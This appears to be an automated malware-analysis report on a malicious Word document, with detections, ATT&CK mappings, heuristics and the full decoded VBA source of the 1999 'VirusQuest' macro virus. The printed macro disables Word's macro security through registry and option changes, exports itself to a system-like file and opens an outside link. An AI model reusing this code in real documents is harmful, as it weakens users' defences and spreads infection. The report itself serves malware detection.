Verdict: MALICIOUS (Risk Score: 142)
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious Link
The sample is a malicious Word document containing VBA macros. The macro attempts to disable security features and then follows a hyperlink to 'http://www.jring.inter.net/'. It also attempts to export itself as 'c:\VirusQuest.sys', suggesting downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further indicate malicious intent.
Heuristics (3)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.jring.inter.net/ (In document text (OLE body))
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1910 bytes |

SHA-256: 77a176e87e2b77f27dda07575ca992c5bec478827c439425220fab50fe7bfb15
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VirusQuest"
'======================================================
' VirusQuest by Dr Virus Quest
' Origin from Malaysia
' Copyright©1999
'======================================================
Public Skip As Integer
Private Sub VirusQuest()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If
    Application.ScreenUpdating = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Application.VBE.ActiveVBProject.VBComponents("VirusQuest").Export "c:\VirusQuest.sys"
    ActiveDocument.ReadOnlyRecommended = False
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Dr Virus Quest"
        .Execute
    End With
    ActiveDocument.FollowHyperlink Address:= _
        "http://www.jring.inter.net/" _
        , NewWindow:=False, AddHistory:=True
End Sub
Private Sub Effect()
    On Error Resume Next
    If Day(Date) = "1" Then
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "Author: Dr Virus Quest"
            .Heading = "VirusQuest"
            .Animation = msoAnimationSearching
            .Show
        End With
        MsgBox "Thanks friends", vbOKOnly, "VirusQuest"
    Else
    End If
End Sub
```